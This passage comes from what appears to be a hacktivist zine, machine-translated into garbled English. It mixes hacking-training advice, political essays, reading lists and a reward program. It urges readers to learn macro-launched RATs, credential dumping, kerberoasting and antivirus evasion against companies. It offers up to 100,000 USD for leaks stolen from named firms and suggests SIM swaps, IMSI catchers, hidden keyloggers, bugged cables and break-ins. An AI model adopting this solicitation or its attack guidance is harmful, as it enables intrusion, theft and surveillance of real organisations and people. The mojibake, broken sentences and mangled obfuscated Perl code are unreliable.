         ; ___: | difference is that they rob the poor |
    , - '(..' '--.__ | covered by the law, heaven knows, and we |
  _; ||| \ | we plunder the rich under the sole protection of |
 '._, -----' ''; = .____, "| our own courage. Shouldn't you prefer to be |
   /// <or> | ## | | one of us, rather than go before those |and then little by little you are improving.
    That is why I always say that one of the most valuable virtues is persistence.
    - Octavia Butler's advice for the APT candidate


The best way to learn to hack is by hacking. Put together a laboratory with
virtual machines and start testing things, taking a break to investigate
anything you don't understand. At a minimum, you will want a windows server
as a domain controller, another normal Windows vm attached to the domain, and a
development machine with visual studio to compile and modify tools.
Try to make an office document with macros that launch meterpreter or another
RAT, and try meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying,
psexec and other side pass techniques [1]; as well as the other scripts,
tools and techniques mentioned in this guide and in the previous one [2]. To the
At first you can disable windows defender, but then try it all by
having it activated [3] [4] (but deactivating the automatic sending of samples).
Once you're happy with all that, you'll be ready to hack 99% of the
companies. There are a couple of things that at some point will be very useful in your
learning, such as developing comfortably with bash and cmd.exe, a
basic domain of powershell, python and javascript, having knowledge of kerberos [5] [6]
and active directory [7] [8] [9] [10], and a fluent English. A good
introductory book is The Hacker Playbook.

I also want to write a little about things to not focus on if you don't
You want to entertain only because someone has told you that you are not a "
real" hacker if you do not know assembler. Obviously, learn whatever interests you,
but I write these lines thinking about those things you can
focus on in order to get practical results if you are looking for hacking
companies to filter and expropriate. A basic knowledge of
web application security [11] is useful, but specializing more in web security is not
really the best use of your time, unless you want to make a career in
pentesting or hunting bug rewards. The CTFs, and most of the
resources you'll find when looking for information about hacking, focus
generally in skills such as web security, reverse engineering,
exploit development , etc. Things that make sense by understanding them as a way to
prepare people for careers in the industry, but not for our
goals. Intelligence agencies can afford to have a team
dedicated to the most advanced in fuzzing, a team working on
exploit development with a team investigating exclusively the new techniques of
mound manipulation, etc. We don't have the time or the
resources for that. The two most important skills for
practical hacking are phishing [12] and social engineering to gain access
initial, and then be able to scale and move through the windows domains.

[1] https://hausec.com/2019/08/12/offensive-lateral-movement/
[2] https://www.exploit-db.com/papers/41914
[3] https: // blog. sevagas.com/IMG/pdf/BypassAVDynamics.pdf
[4] https://www.trustedsec.com/blog/
    discovering-the-anti-virus-signature-and-bypassing-it /
[5] https: // www .tarlogic.com / en / blog / how-kerberos-works /
[6] https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
[7] https://hausec.com / 2019/03/05 / penetration-testing-active-directory-part-i /
[8] https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
[9 ] https://adsecurity.org/
[10] https://github.com/infosecn1nja/AD-Attack-Defense
[11] https://github.com/jhaddix/tbhm
[12] https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-
     external-engagement-through-spear-phishing /


--[ 12 - Lecturas Recomendadas ]------------------------------------------------

 __________________________________________
/ When the scientific level of a world \
| far exceeds its level of solidarity, |
\ that world destroys itself. /
 ------------------------------------------
                  \ _.---. _. .
            * \. ' '. *
* _.- ~ =========== ~ -._
    . (___________________). *
              . ' \ _______ /. '
                           . ' . '
                          '
                     - Ami

Almost all the hacking today is done by black hat hackers, for
personal gain; or for white hat hackers, for the benefit of the
shareholders (and in defense of the banks, companies and states that are
annihilating us and the planet in which we live); and by military and
intelligence agencies, as part of their war and conflict agenda. Seeing
that this our world is already at the limit, I have thought that, in addition to these
technical tips to learn how to hack, I should include some resources that
have been very important for my development and have guided me in the use of my
Hacking knowledge

* Ami: The Child of the Stars - Enrique Barrios

* Anarchy Works
  https://es.theanarchistlibrary.org/library/peter-gelderloos-la-anarquia-
  works

* Living My Life - Emma Goldman

* The Rise and Fall of Jeremy Hammond: Enemy of the State
  https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy-
  hammond-enemy-of-the-state-183599 /

  This quarter and the HBGary hack were an inspiration

* Days of War, Nights of Love - Crimethinc

* Momo - Michael Ende

* Letters to a young man poet - Rilke

* Dominion (Documentary)
  "we cannot believe that, if we do not look, what we do not want to see will not happen"
  - Tolstoy in ÐŸÐµÑ € Ð²Ð ° Ñ ?? Ñ ?? Ñ‚ÑƒÐ¿ÐµÐ½ÑŒ

* Bash Back!


- [13 - Heal] ------------------------------------------- ---------------------

The hacker world has a high incidence of depression, suicides and certain
battles with mental health. I don't think it's because of hacking, but because of the
kind of environment that hackers mostly come from. Like many
hackers, I grew up with little human contact: I was a girl raised by the internet.
I have my struggles with depression and emotional numbness. Willie Sutton
is frequently quoted as saying that he robbed banks because "that's where
the money is," but the quote is incorrect. What he really said was:

    Why did he rob banks? Because I enjoyed it. I loved to do it. I was more
    I live when I was inside a bank, in full robbery, than at any
    other time in my life. I enjoyed it so much that one or two weeks later I
    was already looking for the next opportunity. But for me the money was a
    minutiae, nothing more.

Hacking has made me feel alive. It started as a way to self-medicate the
depresiÃ³n. MÃ¡s tarde me di cuenta de que, en realidad, podÃa servir para hacer
positive. I do not regret the way I grew up at all, it brought several
beautiful experiences to my life. But I knew I couldn't continue living
that way. So I started to spend more time away from my computer, with
other people, learning to open myself to the world, to feel my emotions, to
connect with others, to accept risks and be vulnerable. Things much
harder than hacking, but at the mere hour the reward is worth it. It still makes
me an effort, but even if it is slow and wobbly, I feel that
I am on the right track.

Hacking, done with conscience, can also be what heals us. According to the
Mayan wisdom, we have a gift granted by nature, which we must
understand to put it at the service of the community. In [1], it is explained:

    When a person does not accept his work or mission he begins to suffer
    enfermedades, aparentemente incurables; aunque no llega a morir en corto
    time, but only suffers, with the aim of waking up or becoming
    aware. That is why it is essential that a person who has acquired the
    knowledge and does his work in the communities must pay his Toj and
    maintain constant communication with the Creator and his ruwÃ¤ch qâ € ™ ij, since he
    constantly needs the strength and energy of these. Otherwise,
    the diseases that reacted They could take the job or
    return to cause damage ± o.

If you feel that hacking is fueling your isolation, depression, or other
conditions, breathe. Give yourself some time to meet and become aware. You
deserve to live happily, with health and fullness.

 ________________________
<All Cows Are Beautiful>
 ------------------------
         \
          \ ^ __ ^
            (oo)\_______
         ((__) \) \ / \
          _) / || ---- w |
         (.) / || ||
          ``

[1] Ruxeâ € ™ el mayabâ € ™ Kâ € ™ aslemÃ¤l: Root and spirit of Mayan knowledge
    https://www.url.edu.gt/publicacionesurl/FileCS.ashx?Id=41748


- [14 - The Bug Hacktivist Program] ------------------------------

It seems to me that hacking to get and filter documents of interest The public is
one of the best ways in which hackers can use their skills for the
benefit of society. Unfortunately for us hackers, as in almost
every category, the perverse incentives of our economic system do not match
with what benefits society. So this program is my attempt to
make it possible for good hackers to earn a living honestly
by revealing material of public interest, instead of having to
sell their work to the cybersecurity, cybercrime industries. or
cyber war. Some examples of companyâ ± AAS whose leaks I'd love to
pay They're mining companies, logging and cattle looting our
beautiful AmÃ © rica Latina (and kill defenders of land and territory
trying to stop them ), companies involved in attacks on Rojava like
Havelsan, Baykar Makina, or Aselsan, surveillance companies such as the NSO group,
war criminals and birds of prey such as Blackwater and Halliburton, private
penitentiary companies such as GeoGroup and CoreCivic / CCA, and corporate lobbyists such
as ALEC. Pay attention when choosing where to investigate. For example, it is
well known that oil companies are evil: they get rich at the cost of destroying
the planet (and back in the 80s the companies themselves already knew the
consequences of their activity [1]). But if you hack them directly, you will have
to dive through an incredible amount of boring information about
their daily operations. You will probably
find it much easier to find something interesting if instead you focus on your lobbyists [2]. Other
One way to select viable objectives is to read stories of
investigative journalists (such as [3]), which are interesting but lack
solid evidence . And that is exactly what your hacks can find.

I will pay up to 100 thousand USD for each such leak, according to the interest
pÃºblico e impacto del material, y el laburo requerido en el hackeo. Sobra decir
that a complete leak of the documents and internal communications of
any of these companies will be a benefit for the society that exceeds
those one hundred thousand, but I am not trying To enrich anyone. I just want to provide
enough funds so that hackers can earn a decent living
doing a good job. Due to time constraints and considerations of
For sure, I am not going to open the material, nor inspect it for myself, but I will
read what the press says about it once it has been published, and I will make an
estimate of the public interest from there. My contact information is
at the end of the guide mentioned above [4].

How you get the material is your thing. You can use the traditional
hacking techniques outlined in this guide and the previous one [4]. You could do a
swap sim [5] to a corrupt businessman or politician, and then download his emails and
backups from the cloud. You can order an IMSI catcher from alibaba and use it outside
its offices. You can do some war-driving (old or new
[6]). You may be a person within your organizations that already has
access. You can opt for a low-tech old-school style like in [7] and [8], and
simply sneak into their offices. Whatever works for you.

[1] https://www.theguardian.com/environment/climate-consensus-97-per-cent/2018/
    Sep / 19 / shell-and-exxons-secret-1980s-climate-change-warnings
[2] https : //theintercept.com/2019/08/19/oil-lobby-pipeline-protests/
[3] https://www.bloomberg.com/features/2016-como-manipular-una-eleccion/
[4] https://www.exploit-db.com/papers/41914
[5] https : //www.vice.com/en_us/article/vbqax3/
    hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin
[6] https://blog.rapid7.com/2019/09/05/this -one-time-on-a-pen-test-your-mouse-
    is-my-keyboard /
[7] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[8] https://en.wikipedia.org/wiki/Unnecessary_Fuss


---- [14.1 - Partial payments] --------------------------------------------------

Are you a good-hearted waitress working in a company of evil [1]?
Would you be willing to sneak a physical keylogger into
an executive's computer, change your USB charging cable for a modified one
[2], hide a microphone in a meeting room where you plan your
atrocities, or leave one of these [ 3] forgotten somewhere in the
offices?

[1] https://en.wikipedia.org/wiki/Evil_maid_attack
[2] http://mg.lol/blog/defcon-2019/
[3] https://shop.hak5.org/products/lan-turtle

Are you good with social engineering and phishing, and did you get a shell in the
computer of an employee, or out there got their credentials vpn
using phishing? But maybe you couldn't get domain admin and download
what you wanted?

Did you participate in bug bounce programs and become an expert in
web application hacking, but don't have enough hacker experience
to completely penetrate the company?

Do you have facility with reverse engineering? Scan some evil companies
to see which devices are exposed to the internet (firewall, vpn, and
email gateways will be much more useful than things like
IP cameras ), apply reverse engineering and find some exploitable vulnerability
remotely.

If it is possible for me to work with you to penetrate the company and get
public interest material , you will also be rewarded for your work. If I
do n't have the time to work on it myself, at least I will try to advise you
on how to continue until you can complete the hacking on your own.

Supporting those in power to hack and monitor dissidents, activists and
the general population is today an industry of several billion
of dollars, while hacking and exposing those in power is a
voluntary and risky job. Turning it into an industry of several million
dollars will certainly not fix that power imbalance, nor will it
solve the problems of society. But I think it will be fun. So
... I want to see people starting to collect their rewards!


- [15 - Abolish prisons] ----------------------------------------- --------

                   Built by the enemy to enclose ideas by
                enclosing companions to silence war cries
                    is the center of torture and annihilation
                   where the human being becomes more violent
              It is the reflection of society, repressive and prison
                   held and based on authoritative logic
                       guarded repressed and guarded
                   thousands of prisoners and prisoners are exterminated
                 before this schizophrenic and ruthless machine
                 companion Axel Osorio giving the stripping in the cane
                  breaking the isolation and silencing
                  fire and war to jail, we are destroying!

                    Rap Insurgent - Words In Conflict It


would be typical to end a zine hacker saying release hammond, release
manning, free hamza, free detainees by mounting the Ð´ÐµÐ »Ð¾ Ð¡ÐµÑ‚Ð¸,
etc. I will take this tradition to its most radical consequence [1], and to say:
we must abolish prisons now! Being a criminal myself, you may
think that what happens is that I have a slightly skewed view of the matter.
But seriously, it is not even a controversial issue, even the UN
practically agrees [2]. So, once and for all, free the
migrants [3] [4] [5] [6], often imprisoned by those same countries that created
the war and the environmental and economic destruction from which they are fleeing. Free
all who are in prison for war against those who use drugs [7].
Free all people imprisoned for war against the poor [8].
The only thing they do is hide and ignore the proof of the
existence of social problems, instead of fixing them. And
until everyone is released, fight the prison system by remembering and
keeping in mind those who are trapped in there. Send them love,
letters, helicopters [9], pirate radios [10] and books, and support those who
organize from in there [11] [12].

[1] http://www.bibliotecafragmentada.org/wp-content/uploads/2017/12/
    Davis-Son-obsoletas-las-prison-final.pdf
[2] http://www.unodc.org/pdf / criminal_justice / Handbook_of_Basic_Principles_and_
    Promising_Practices_on_Alternatives_to_Imprisonment.pdf
[3] https://www.theguardian.com/us-news/2016/dec/21/
    us-immigration-detention-center-christmas-santa-wish-list
[4] https: // www. theguardian.com/us-news/2016/aug/18/us-border-patrol-facility-
    images-tucson-arizona
[5] https://www.playgroundmag.net/now/detras-Centros-Interizaje-Extranjeros-
    Spain_22648665.html
[6] https://www.nytimes.com/2019/06/26/world/australia/
    australia-manus-suicide.html
[7] https://en.wikiquote.org/wiki/John_Ehrlichman# Quotes
[8] VI, 2. i. The unpaid fine: https://scielo.conicyt.cl/scielo.php?script=
    sci_arttext & pid = S0718-00122012000100005
[9] p. 10, Libelo No. 2. Political bulletin from the High Security Prison
[10] https://itsgoingdown.org/transmissions-hostile-territory/
[11] https://freealabamamovement.wordpress.com/fam-pamphlet-who-we-are/
[12] https://incarceratedworkers.org/


- [16 - Conclusion] -------------------------------- ---------------------------

Our world is upside down [1]. We have a justice system that
represents injustice. Law and order are there to create an illusion
of social peace, and to hide the systematic and profound aspects of exploitation,
violence, and injustice. Better follow your conscience, and not the law.

[1] http://resistir.info/livros/galeano_patas_arriba.pdf

Businessmen enrich themselves by mistreating people and the planet,
while care work is largely unpaid. Through the
assault on everything communal, we have somehow built up densely
populated cities , plagued by loneliness and isolation. The cultural,
political and economic system in which we live encourages the worst facets of
human nature : greed, selfishness and self-centeredness, competitiveness, lack of
compassion and attachment to authority. So that for anyone who has managed to
remain sensitive and compassionate in a world cold, for all heroÃnas
everyday practicing goodness in things small ± as, for all you who
they still have a burning star in their hearts: Ð³Ð¾pÐ¸, Ð³Ð¾pÐ¸ Ñ ?? Ñ ?? Ð½Ð¾, Ñ ‡ Ñ‚Ð¾Ð ± Ñ ‹Ð½Ðµ
Ð¿Ð¾Ð³Ð ° Ñ ?? Ð» Ð¾!

                     _____________________
                    <Let's sing together! >
                     ---------------------
                             \
                              \ ^ __ ^
                                (oo) \ _______
                             ((__) \) \ / \
                              _) / || ---- w |
                             (.) / || ||

                                 Open heart,

                               feel you, open

                              understanding

                            Leave the reason aside

                And let the sun shine inside you


perl -Mre = eval << \ EOF
                                       ''
                                      = ~ (
                                      '(?'
                                     . '{'. (
                                    '' '|'% '
                                    ). (" \ ["^
                                   '-'). ('`'                                 |
                                  '!'). ("\` "|
                                  ','). '" (\\ $'
                                 . ': = `'. (('' ') |
                                ' # '). (' ['^'. ' ).
                                ('[' ^ ')'). ("\` "|
     ','). ('{' ^ '[') .'- '. (' ['^' ('). (' { '^' ['). (' `'|' ('). (' ['^' / '). (' ['^' / '). (
    ' ['^' + '). (' [ '^' (').': // '. (' `'|'% '). ('` '|'. '). ('   `'|', '). ('` '|'! '). ("\` "|
      ' # '). ('` '|'% '). (' ['^'! '). ( '' '|'! '). (' ['^' + '). (' `'|'! '). (' ['^" \ / "). (
         '` '|') '). ('[' ^ '('). ('[' ^ '/'). ('`' | '!'). '.'. ('`' | '%'). ('[' ^ ' ! ')       ('' '|'% '). (' ['^'! ')('' '|'% '). (' ['^'! ')
            . ('' '|', '). (' '' | '.'). '.'. ('`' | '/'). ('[' ^ ')'). ('' '| "\ '").
              '.'. ('' '|' - '). (' ['^' # ').' / '. (' ['^' ('). (' '' | ('$')). (
                 '[' ^ '('). ('`' | ',') .'- '. (' '' | '%'). ('[' ^ ('(')).
                    '/`) = ~ '. (' ['^' (').' | </ '. (' ['^' + ').'> | \\ '
                       .' \\ '. (' `'|'. ' ). '|'. ('`' |" '").'; '.
                         '                        $ ^ = ')' ^ '[';
                  $ / = '' '|'. ';
                  $, = '('
EOF


               Nosotras nacimos de la noche.
               We live in it, we hack in it.

               Here we are, we are the rebel dignity,
               the forgotten heart of the Ð˜Ð½Ñ‚ÐµÑ € Ð½ÐµÑ ‚.

               Our fight is for memory and justice,
               and bad government is filled with criminals and murderers.

               Our fight is for fair and decent work,
               and bad government and corporations buy and sell zero days.

               For all tomorrow.
               For us, the cheerful rebellion of leaks
               and expropriation.

               For all everything.
               For us nothing.


               From the mountains of the Cyber Southeast,

                _ _ _ ____ _ _
               | | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
               | | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
               | _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
               | _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)